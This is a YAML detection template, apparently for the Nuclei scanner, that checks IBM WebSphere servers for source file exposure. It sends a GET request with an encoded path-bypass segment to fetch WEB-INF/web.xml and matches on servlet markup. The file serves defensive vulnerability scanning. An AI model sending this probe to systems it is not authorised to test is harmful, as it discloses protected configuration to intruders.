id: ibm-websphere-xml

info:
  name: IBM WebSphere Application - Source File Exposure
  author: r3nz0
  severity: medium
  description: |
    Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/ibm-websphere-weblogic-application-source-file-exposure/
  metadata:
    max-request: 1
    verified: true
  tags: ibm,websphere,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "<servlet>"
        condition: and

      - type: status
        status:
          - 200